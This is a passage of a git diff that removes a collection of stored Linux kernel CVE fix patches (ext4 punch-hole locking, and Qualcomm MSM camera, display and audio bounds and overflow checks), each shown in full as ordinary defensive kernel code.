err; -+} -+ -+/* -+ * Handle write fault for VM_MIXEDMAP mappings. Similarly to ext4_dax_mkwrite() -+ * handler we check for races agaist truncate. Note that since we cycle through -+ * i_mmap_sem, we are sure that also any hole punching that began before we -+ * were called is finished by now and so if it included part of the file we -+ * are working on, our pte will get unmapped and the check for pte_same() in -+ * wp_pfn_shared() fails. Thus fault gets retried and things work out as -+ * desired. -+ */ -+static int ext4_dax_pfn_mkwrite(struct vm_area_struct *vma, -+ struct vm_fault *vmf) -+{ -+ struct inode *inode = file_inode(vma->vm_file); -+ struct super_block *sb = inode->i_sb; -+ int ret = VM_FAULT_NOPAGE; -+ loff_t size; -+ -+ sb_start_pagefault(sb); -+ file_update_time(vma->vm_file); -+ down_read(&EXT4_I(inode)->i_mmap_sem); -+ size = (i_size_read(inode) + PAGE_SIZE - 1) >> PAGE_SHIFT; -+ if (vmf->pgoff >= size) -+ ret = VM_FAULT_SIGBUS; -+ up_read(&EXT4_I(inode)->i_mmap_sem); -+ sb_end_pagefault(sb); -+ -+ return ret; - } - - static const struct vm_operations_struct ext4_dax_vm_ops = { - .fault = ext4_dax_fault, - .pmd_fault = ext4_dax_pmd_fault, - .page_mkwrite = ext4_dax_mkwrite, -- .pfn_mkwrite = dax_pfn_mkwrite, -+ .pfn_mkwrite = ext4_dax_pfn_mkwrite, - }; - #else - #define ext4_dax_vm_ops ext4_file_vm_ops - #endif - - static const struct vm_operations_struct ext4_file_vm_ops = { -- .fault = filemap_fault, -+ .fault = ext4_filemap_fault, - .map_pages = filemap_map_pages, - .page_mkwrite = ext4_page_mkwrite, - }; -diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c -index ea433a7..d1207d0 100644 ---- a/fs/ext4/inode.c -+++ b/fs/ext4/inode.c -@@ -3623,6 +3623,15 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length) - - } - -+ /* Wait all existing dio workers, newcomers will block on i_mutex */ -+ ext4_inode_block_unlocked_dio(inode); -+ inode_dio_wait(inode); -+ -+ /* -+ * Prevent page faults from reinstantiating pages we have released 
from -+ * page cache. -+ */ -+ down_write(&EXT4_I(inode)->i_mmap_sem); - first_block_offset = round_up(offset, sb->s_blocksize); - last_block_offset = round_down((offset + length), sb->s_blocksize) - 1; - -@@ -3631,10 +3640,6 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length) - truncate_pagecache_range(inode, first_block_offset, - last_block_offset); - -- /* Wait all existing dio workers, newcomers will block on i_mutex */ -- ext4_inode_block_unlocked_dio(inode); -- inode_dio_wait(inode); -- - if (ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS)) - credits = ext4_writepage_trans_blocks(inode); - else -@@ -3680,16 +3685,12 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length) - if (IS_SYNC(inode)) - ext4_handle_sync(handle); - -- /* Now release the pages again to reduce race window */ -- if (last_block_offset > first_block_offset) -- truncate_pagecache_range(inode, first_block_offset, -- last_block_offset); -- - inode->i_mtime = inode->i_ctime = ext4_current_time(inode); - ext4_mark_inode_dirty(handle, inode); - out_stop: - ext4_journal_stop(handle); - out_dio: -+ up_write(&EXT4_I(inode)->i_mmap_sem); - ext4_inode_resume_unlocked_dio(inode); - out_mutex: - mutex_unlock(&inode->i_mutex); -@@ -4823,6 +4824,7 @@ int ext4_setattr(struct dentry *dentry, struct iattr *attr) - } else - ext4_wait_for_tail_page_commit(inode); - } -+ down_write(&EXT4_I(inode)->i_mmap_sem); - /* - * Truncate pagecache after we've waited for commit - * in data=journal mode to make pages freeable. -@@ -4830,6 +4832,7 @@ int ext4_setattr(struct dentry *dentry, struct iattr *attr) - truncate_pagecache(inode, inode->i_size); - if (shrink) - ext4_truncate(inode); -+ up_write(&EXT4_I(inode)->i_mmap_sem); - } - - if (!rc) { -@@ -5278,6 +5281,8 @@ int ext4_page_mkwrite(struct vm_area_struct *vma, struct vm_fault *vmf) - - sb_start_pagefault(inode->i_sb); - file_update_time(vma->vm_file); -+ -+ down_read(&EXT4_I(inode)->i_mmap_sem); - /* Delalloc case is easy... 
*/ - if (test_opt(inode->i_sb, DELALLOC) && - !ext4_should_journal_data(inode) && -@@ -5347,6 +5352,19 @@ retry_alloc: - out_ret: - ret = block_page_mkwrite_return(ret); - out: -+ up_read(&EXT4_I(inode)->i_mmap_sem); - sb_end_pagefault(inode->i_sb); - return ret; - } -+ -+int ext4_filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf) -+{ -+ struct inode *inode = file_inode(vma->vm_file); -+ int err; -+ -+ down_read(&EXT4_I(inode)->i_mmap_sem); -+ err = filemap_fault(vma, vmf); -+ up_read(&EXT4_I(inode)->i_mmap_sem); -+ -+ return err; -+} -diff --git a/fs/ext4/super.c b/fs/ext4/super.c -index c9ab67d..493370e 100644 ---- a/fs/ext4/super.c -+++ b/fs/ext4/super.c -@@ -958,6 +958,7 @@ static void init_once(void *foo) - INIT_LIST_HEAD(&ei->i_orphan); - init_rwsem(&ei->xattr_sem); - init_rwsem(&ei->i_data_sem); -+ init_rwsem(&ei->i_mmap_sem); - inode_init_once(&ei->vfs_inode); - } - -diff --git a/fs/ext4/truncate.h b/fs/ext4/truncate.h -index 011ba66..c70d06a 100644 ---- a/fs/ext4/truncate.h -+++ b/fs/ext4/truncate.h -@@ -10,8 +10,10 @@ - */ - static inline void ext4_truncate_failed_write(struct inode *inode) - { -+ down_write(&EXT4_I(inode)->i_mmap_sem); - truncate_inode_pages(inode->i_mapping, inode->i_size); - ext4_truncate(inode); -+ up_write(&EXT4_I(inode)->i_mmap_sem); - } - - /* --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2015-8839/ANY/0002.patch deleted file mode 100644 index d3684165..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0002.patch +++ /dev/null 
@@ -1,37 +0,0 @@
-From f0ac071fc6660c1d8d4b0d0dbe7642dd1274e4a5 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers
-Date: Mon, 18 Jul 2016 12:45:17 -0700
-Subject: [PATCH] fs: ext4: disable support for fallocate FALLOC_FL_PUNCH_HOLE
-
-Bug: 28760453
-Change-Id: I019c2de559db9e4b95860ab852211b456d78c4ca
-Signed-off-by: Nick Desaulniers
----
- fs/ext4/inode.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
-index 589d6d3134e01..bf37388aa01b7 100644
---- a/fs/ext4/inode.c
-+++ b/fs/ext4/inode.c
-@@ -3503,6 +3503,7 @@ int ext4_can_truncate(struct inode *inode)
-
- int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length)
- {
-+#if 0
- struct super_block *sb = inode->i_sb;
- ext4_lblk_t first_block, stop_block;
- struct address_space *mapping = inode->i_mapping;
-@@ -3626,6 +3627,12 @@ int ext4_punch_hole(struct inode *inode, loff_t offset, loff_t length)
- out_mutex:
- mutex_unlock(&inode->i_mutex);
- return ret;
-+#else
-+ /*
-+ * Disabled as per b/28760453
-+ */
-+ return -EOPNOTSUPP;
-+#endif
- }
-
- int ext4_inode_attach_jinode(struct inode *inode)
diff --git a/Patches/Linux_CVEs/CVE-2015-8937/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8937/ANY/0001.patch
deleted file mode 100644
index 65ec4018..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8937/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From c66202b9288cc4ab1c38f7c928fa1005c285c170 Mon Sep 17 00:00:00 2001
-From: Ravi Aravamudhan
-Date: Wed, 11 Feb 2015 17:21:11 -0800
-Subject: diag: Make fixes to diag_switch_logging
-
-Diag driver holds on to the socket process task structure even
-after signaling the process to exit. This patch clears the internal
-handle after signaling.
-
-Change-Id: I642fb595fc2caebc6f2f5419efed4fb560e4e4db
-Signed-off-by: Ravi Aravamudhan
----
- drivers/char/diag/diagchar_core.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 331ed97..b8343c3 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -930,6 +930,7 @@ static int diag_switch_logging(int requested_mode)
- pr_err("socket process, status: %d\n",
- status);
- }
-+ driver->socket_process = NULL;
- }
- } else if (driver->logging_mode == SOCKET_MODE) {
- driver->socket_process = current;
----
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8938/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8938/ANY/0001.patch
deleted file mode 100644
index 8eae46ad..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8938/ANY/0001.patch
+++ /dev/null
@@ -1,255 +0,0 @@ -From 51c39420e3a49d1a7f05a77c64369b7623088238 Mon Sep 17 00:00:00 2001 -From: Sreesudhan Ramakrish Ramkumar -Date: Fri, 12 Dec 2014 04:20:59 -0800 -Subject: msm: camera: isp: Validate input parameter for vfe_write and vfe_read - -Validate input parameters for read and write operations in vfe to -ensure operations are performed within vfe register boundary and -within structure limits passed by caller. - -Change-Id: If3719de65b32773c2b6ff904da76a951dbfb11eb -Signed-off-by: Sreesudhan Ramakrish Ramkumar ---- - .../platform/msm/camera_v2/isp/msm_isp_util.c | 126 +++++++++++++-------- - .../msm/camera_v2/sensor/io/msm_camera_io_util.c | 11 ++ - .../msm/camera_v2/sensor/io/msm_camera_io_util.h | 2 + - 3 files changed, 89 insertions(+), 50 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -index c598555..ff213fc 100644 ---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c -@@ -917,7 +917,8 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - /* Validate input parameters */ - switch (reg_cfg_cmd->cmd_type) { - case VFE_WRITE: -- case VFE_READ: { -+ case VFE_READ: -+ case VFE_WRITE_MB: { - if ((reg_cfg_cmd->u.rw_info.reg_offset > - (UINT_MAX - reg_cfg_cmd->u.rw_info.len)) || - ((reg_cfg_cmd->u.rw_info.reg_offset + -@@ -943,6 +944,58 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - } - break; - } -+ -+ case VFE_WRITE_DMI_16BIT: -+ case VFE_WRITE_DMI_32BIT: -+ case VFE_WRITE_DMI_64BIT: -+ case VFE_READ_DMI_16BIT: -+ case VFE_READ_DMI_32BIT: -+ case VFE_READ_DMI_64BIT: { -+ if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) { -+ if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <= -+ reg_cfg_cmd->u.dmi_info.lo_tbl_offset) || -+ (reg_cfg_cmd->u.dmi_info.hi_tbl_offset - -+ reg_cfg_cmd->u.dmi_info.lo_tbl_offset != -+ (sizeof(uint32_t)))) { -+ pr_err("%s:%d hi %d lo %d\n", -+ 
__func__, __LINE__, -+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset, -+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset); -+ return -EINVAL; -+ } -+ if (reg_cfg_cmd->u.dmi_info.len <= sizeof(uint32_t)) { -+ pr_err("%s:%d len %d\n", -+ __func__, __LINE__, -+ reg_cfg_cmd->u.dmi_info.len); -+ return -EINVAL; -+ } -+ if (((UINT_MAX - -+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset) < -+ (reg_cfg_cmd->u.dmi_info.len - -+ sizeof(uint32_t))) || -+ ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset + -+ reg_cfg_cmd->u.dmi_info.len - -+ sizeof(uint32_t)) > cmd_len)) { -+ pr_err("%s:%d hi_tbl_offset %d len %d cmd %d\n", -+ __func__, __LINE__, -+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset, -+ reg_cfg_cmd->u.dmi_info.len, cmd_len); -+ return -EINVAL; -+ } -+ } -+ if ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset > -+ (UINT_MAX - reg_cfg_cmd->u.dmi_info.len)) || -+ ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset + -+ reg_cfg_cmd->u.dmi_info.len) > cmd_len)) { -+ pr_err("%s:%d lo_tbl_offset %d len %d cmd_len %d\n", -+ __func__, __LINE__, -+ reg_cfg_cmd->u.dmi_info.lo_tbl_offset, -+ reg_cfg_cmd->u.dmi_info.len, cmd_len); -+ return -EINVAL; -+ } -+ break; -+ } -+ - default: - break; - } -@@ -956,39 +1009,27 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - break; - } - case VFE_WRITE_MB: { -- uint32_t *data_ptr = cfg_data + -- reg_cfg_cmd->u.rw_info.cmd_data_offset/4; -- -- if ((UINT_MAX - sizeof(*data_ptr) < -- reg_cfg_cmd->u.rw_info.reg_offset) || -- (resource_size(vfe_dev->vfe_mem) < -- reg_cfg_cmd->u.rw_info.reg_offset + -- sizeof(*data_ptr))) { -- pr_err("%s: VFE_WRITE_MB: Invalid length\n", __func__); -- return -EINVAL; -- } -- msm_camera_io_w_mb(*data_ptr, vfe_dev->vfe_base + -- reg_cfg_cmd->u.rw_info.reg_offset); -+ msm_camera_io_memcpy_mb(vfe_dev->vfe_base + -+ reg_cfg_cmd->u.rw_info.reg_offset, -+ cfg_data + reg_cfg_cmd->u.rw_info.cmd_data_offset/4, -+ reg_cfg_cmd->u.rw_info.len); - break; - } - case VFE_CFG_MASK: { - uint32_t temp; -- if (resource_size(vfe_dev->vfe_mem) < -- 
reg_cfg_cmd->u.mask_info.reg_offset) -- return -EINVAL; -- temp = msm_camera_io_r(vfe_dev->vfe_base + -- reg_cfg_cmd->u.mask_info.reg_offset); -- -- temp &= ~reg_cfg_cmd->u.mask_info.mask; -- temp |= reg_cfg_cmd->u.mask_info.val; - if ((UINT_MAX - sizeof(temp) < -- reg_cfg_cmd->u.mask_info.reg_offset) || -+ reg_cfg_cmd->u.mask_info.reg_offset) || - (resource_size(vfe_dev->vfe_mem) < - reg_cfg_cmd->u.mask_info.reg_offset + - sizeof(temp))) { - pr_err("%s: VFE_CFG_MASK: Invalid length\n", __func__); - return -EINVAL; - } -+ temp = msm_camera_io_r(vfe_dev->vfe_base + -+ reg_cfg_cmd->u.mask_info.reg_offset); -+ -+ temp &= ~reg_cfg_cmd->u.mask_info.mask; -+ temp |= reg_cfg_cmd->u.mask_info.val; - msm_camera_io_w(temp, vfe_dev->vfe_base + - reg_cfg_cmd->u.mask_info.reg_offset); - break; -@@ -1000,24 +1041,9 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL; - uint32_t hi_val, lo_val, lo_val1; - if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) { -- if ((UINT_MAX - reg_cfg_cmd->u.dmi_info.hi_tbl_offset < -- reg_cfg_cmd->u.dmi_info.len - -- sizeof(uint32_t)) || -- (reg_cfg_cmd->u.dmi_info.hi_tbl_offset + -- reg_cfg_cmd->u.dmi_info.len - -- sizeof(uint32_t) > cmd_len)) { -- pr_err("Invalid Hi Table out of bounds\n"); -- return -EINVAL; -- } - hi_tbl_ptr = cfg_data + - reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4; - } -- -- if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset + -- reg_cfg_cmd->u.dmi_info.len > cmd_len) { -- pr_err("Invalid Lo Table out of bounds\n"); -- return -EINVAL; -- } - lo_tbl_ptr = cfg_data + - reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4; - if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) -@@ -1050,24 +1076,17 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL; - uint32_t hi_val, lo_val, lo_val1; - if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) { -- if (reg_cfg_cmd->u.dmi_info.hi_tbl_offset + -- reg_cfg_cmd->u.dmi_info.len - -- sizeof(uint32_t) > 
cmd_len) { -- pr_err("Invalid Hi Table out of bounds\n"); -- return -EINVAL; -- } - hi_tbl_ptr = cfg_data + - reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4; - } - -- if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset + -- reg_cfg_cmd->u.dmi_info.len > cmd_len) { -- pr_err("Invalid Lo Table out of bounds\n"); -- return -EINVAL; -- } - lo_tbl_ptr = cfg_data + - reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4; - -+ if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) -+ reg_cfg_cmd->u.dmi_info.len = -+ reg_cfg_cmd->u.dmi_info.len / 2; -+ - for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) { - lo_val = msm_camera_io_r(vfe_dev->vfe_base + - vfe_dev->hw_info->dmi_reg_offset + 0x4); -@@ -1121,7 +1140,7 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - if ((data_ptr < cfg_data) || - (UINT_MAX / sizeof(*data_ptr) < - (data_ptr - cfg_data)) || -- (sizeof(*data_ptr) * (data_ptr - cfg_data) > -+ (sizeof(*data_ptr) * (data_ptr - cfg_data) >= - cmd_len)) - return -EINVAL; - *data_ptr++ = msm_camera_io_r(vfe_dev->vfe_base + -@@ -1187,6 +1206,13 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev, - case SET_WM_UB_SIZE: - break; - case SET_UB_POLICY: { -+ -+ if (cmd_len < sizeof(vfe_dev->vfe_ub_policy)) { -+ pr_err("%s:%d failed: invalid cmd len %u exp %zu\n", -+ __func__, __LINE__, cmd_len, -+ sizeof(vfe_dev->vfe_ub_policy)); -+ return -EINVAL; -+ } - vfe_dev->vfe_ub_policy = *cfg_data; - break; - } -diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c -index 78b9148..41c784a 100644 ---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c -+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.c -@@ -102,6 +102,17 @@ void msm_camera_io_memcpy(void __iomem *dest_addr, - msm_camera_io_dump(dest_addr, len); - } - -+void msm_camera_io_memcpy_mb(void __iomem *dest_addr, -+ void __iomem *src_addr, u32 len) -+{ -+ int i; -+ u32 *d = (u32 *) dest_addr; -+ u32 
*s = (u32 *) src_addr; -+ -+ for (i = 0; i < (len / 4); i++) -+ msm_camera_io_w_mb(*s++, d++); -+} -+ - int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info, - struct msm_cam_clk_info *clk_src_info, int num_clk) - { -diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h -index fa9a283..2a0e21c 100644 ---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h -+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_io_util.h -@@ -38,6 +38,8 @@ u32 msm_camera_io_r_mb(void __iomem *addr); - void msm_camera_io_dump(void __iomem *addr, int size); - void msm_camera_io_memcpy(void __iomem *dest_addr, - void __iomem *src_addr, u32 len); -+void msm_camera_io_memcpy_mb(void __iomem *dest_addr, -+ void __iomem *src_addr, u32 len); - int msm_cam_clk_sel_src(struct device *dev, struct msm_cam_clk_info *clk_info, - struct msm_cam_clk_info *clk_src_info, int num_clk); - int msm_cam_clk_enable(struct device *dev, struct msm_cam_clk_info *clk_info, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8939/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8939/ANY/0001.patch deleted file mode 100644 index 05b7d3ad..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8939/ANY/0001.patch +++ /dev/null 
@@ -1,67 +0,0 @@
-From 884cff808385788fa620833c7e2160a4b98a21da Mon Sep 17 00:00:00 2001
-From: raghavendra ambadas
-Date: Mon, 16 Mar 2015 18:10:35 +0530
-Subject: msm_fb: display: validate input args of mdp4_argc_process_write_req
-
-A bounds check has to be done for r/g/b stages variables
-to avoid undetermined behaviour.
-
-Change-Id: Ibdc96e79b36cf188d4b5c42d8e2d9ece8e9ace8a
-Signed-off-by: Raghavendra Ambadas
----
- drivers/video/msm/mdp4_util.c | 29 ++++++++++++++++++++++++++---
- 1 file changed, 26 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/video/msm/mdp4_util.c b/drivers/video/msm/mdp4_util.c
-index f8b7f2f..cfcccdb 100644
---- a/drivers/video/msm/mdp4_util.c
-+++ b/drivers/video/msm/mdp4_util.c
-@@ -2739,19 +2739,42 @@ static int mdp4_argc_process_write_req(uint32_t *offset,
- struct mdp_ar_gc_lut_data r[MDP_AR_GC_MAX_STAGES];
- struct mdp_ar_gc_lut_data g[MDP_AR_GC_MAX_STAGES];
- struct mdp_ar_gc_lut_data b[MDP_AR_GC_MAX_STAGES];
-+ uint8_t num_r_stages;
-+ uint8_t num_g_stages;
-+ uint8_t num_b_stages;
-+
-+ if (get_user(num_r_stages, &pgc_ptr->num_r_stages)) {
-+ pr_err("%s failed: num_r_stages : Invalid arg\n", __func__);
-+ return -EFAULT;
-+ }
-+
-+ if (get_user(num_g_stages, &pgc_ptr->num_g_stages)) {
-+ pr_err("%s failed: num_g_stages : Invalid arg\n", __func__);
-+ return -EFAULT;
-+ }
-+
-+ if (get_user(num_b_stages, &pgc_ptr->num_b_stages)) {
-+ pr_err("%s failed: num_b_stages : Invalid arg\n", __func__);
-+ return -EFAULT;
-+ }
-+
-+ if ((!num_r_stages || num_r_stages > MDP_AR_GC_MAX_STAGES) ||
-+ (!num_g_stages || num_g_stages > MDP_AR_GC_MAX_STAGES) ||
-+ (!num_b_stages || num_b_stages > MDP_AR_GC_MAX_STAGES))
-+ return -EINVAL;
-
- ret = copy_from_user(&r[0], pgc_ptr->r_data,
-- pgc_ptr->num_r_stages * sizeof(struct mdp_ar_gc_lut_data));
-+ num_r_stages * sizeof(struct mdp_ar_gc_lut_data));
-
- if (!ret) {
- ret = copy_from_user(&g[0],
- pgc_ptr->g_data,
-- pgc_ptr->num_g_stages
-+ num_g_stages
- * sizeof(struct mdp_ar_gc_lut_data));
- if (!ret)
- ret = copy_from_user(&b[0],
- pgc_ptr->b_data,
-- pgc_ptr->num_b_stages
-+ num_b_stages
- * sizeof(struct mdp_ar_gc_lut_data));
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8940/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8940/ANY/0001.patch
deleted file mode 100644
index 40f6f6f5..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8940/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From e13ebd727d161db7003be6756e61283dce85fa3b Mon Sep 17 00:00:00 2001
-From: Bhalchandra Gajare
-Date: Tue, 10 Feb 2015 14:44:36 -0800
-Subject: ASoC: q6lsm: Add check for integer overflow
-
-During sound model registration, the total memory size needed by the
-sound model data is the sum of sound model length, number of zero
-padding bytes and the calibration size. It is possible this sum
-can result into integer overflow causing difficult to debug issues.
-Add check for integer overflow to avoid such possible issues.
-
-CRs-fixed: 792367
-Change-Id: I9f451aa308214a4eac42b82e2abf1375c858ff30
-Signed-off-by: Bhalchandra Gajare
----
- sound/soc/msm/qdsp6v2/q6lsm.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6lsm.c b/sound/soc/msm/qdsp6v2/q6lsm.c
-index db29115..67be542 100644
---- a/sound/soc/msm/qdsp6v2/q6lsm.c
-+++ b/sound/soc/msm/qdsp6v2/q6lsm.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2014, Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2015, Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1055,6 +1055,15 @@ int q6lsm_snd_model_buf_alloc(struct lsm_client *client, size_t len)
- client->sound_model.size = len;
- pad_zero = (LSM_ALIGN_BOUNDARY -
- (len % LSM_ALIGN_BOUNDARY));
-+ if ((len > SIZE_MAX - pad_zero) ||
-+ (len + pad_zero >
-+ SIZE_MAX - cal_block->cal_data.size)) {
-+ pr_err("%s: invalid allocation size, len = %zd, pad_zero =%zd, cal_size = %zd\n",
-+ __func__, len, pad_zero,
-+ cal_block->cal_data.size);
-+ rc = -EINVAL;
-+ goto fail;
-+ }
-
- total_mem = PAGE_ALIGN(pad_zero + len +
- cal_block->cal_data.size);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8941/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8941/ANY/0001.patch
deleted file mode 100644
index b52c04b1..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8941/ANY/0001.patch
+++ /dev/null
@@ -1,159 +0,0 @@
-From d4d4d1dd626b21e68e78395bab3382c1eb04877f Mon Sep 17 00:00:00 2001
-From: Petar Sivenov
-Date: Tue, 10 Feb 2015 13:46:18 +0200
-Subject: msm:camera:isp: fix array index bound checks
-
-This change fixes several incorrect or missing array index bound checks.
-
-Change-Id: Icd96555c01330ec11e94c6173d8df1973fe39c33
-Signed-off-by: Petar Sivenov
----
- .../platform/msm/camera_v2/isp/msm_isp_axi_util.c | 56 ++++++++++++++--------
- 1 file changed, 36 insertions(+), 20 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index e3be614..bc993cd 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -368,8 +368,8 @@ int msm_isp_axi_check_stream_state(
- return -EINVAL;
-
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-- if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-- > MAX_NUM_STREAM) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+ MAX_NUM_STREAM) {
- return -EINVAL;
- }
- stream_info = &axi_data->stream_info[
-@@ -676,8 +676,10 @@ int msm_isp_request_axi_stream(struct vfe_device *vfe_dev, void *arg)
- &vfe_dev->axi_data, stream_cfg_cmd);
- if (rc) {
- pr_err("%s: Request validation failed\n", __func__);
-- msm_isp_axi_destroy_stream(&vfe_dev->axi_data,
-- HANDLE_TO_IDX(stream_cfg_cmd->axi_stream_handle));
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->axi_stream_handle) <
-+ MAX_NUM_STREAM)
-+ msm_isp_axi_destroy_stream(&vfe_dev->axi_data,
-+ HANDLE_TO_IDX(stream_cfg_cmd->axi_stream_handle));
- return rc;
- }
- stream_info = &vfe_dev->axi_data.
-@@ -748,11 +750,17 @@ int msm_isp_release_axi_stream(struct vfe_device *vfe_dev, void *arg)
- int rc = 0, i;
- struct msm_vfe_axi_stream_release_cmd *stream_release_cmd = arg;
- struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
-- struct msm_vfe_axi_stream *stream_info =
-- &axi_data->stream_info[
-- HANDLE_TO_IDX(stream_release_cmd->stream_handle)];
-+ struct msm_vfe_axi_stream *stream_info;
- struct msm_vfe_axi_stream_cfg_cmd stream_cfg;
-
-+
-+ if (HANDLE_TO_IDX(stream_release_cmd->stream_handle) >=
-+ MAX_NUM_STREAM) {
-+ pr_err("%s: Invalid stream handle\n", __func__);
-+ return -EINVAL;
-+ }
-+ stream_info = &axi_data->stream_info[
-+ HANDLE_TO_IDX(stream_release_cmd->stream_handle)];
- if (stream_info->state == AVALIABLE) {
- pr_err("%s: Stream already released\n", __func__);
- return -EINVAL;
-@@ -1069,6 +1077,11 @@ static void msm_isp_process_done_buf(struct vfe_device *vfe_dev,
- uint8_t drop_frame = 0;
- memset(&buf_event, 0, sizeof(buf_event));
-
-+ if (stream_idx >= MAX_NUM_STREAM) {
-+ pr_err("%s: Invalid stream_idx", __func__);
-+ return;
-+ }
-+
- frame_id = vfe_dev->axi_data.
- src_info[SRC_TO_INTF(stream_info->stream_src)].frame_id;
-
-@@ -1235,8 +1248,8 @@ static void msm_isp_update_camif_output_count(
- return;
-
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-- if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-- > MAX_NUM_STREAM) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i]) >=
-+ MAX_NUM_STREAM) {
- return;
- }
- stream_info =
-@@ -1535,8 +1548,8 @@ static int msm_isp_axi_update_cgc_override(struct vfe_device *vfe_dev,
- return -EINVAL;
-
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-- if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-- > MAX_NUM_STREAM) {
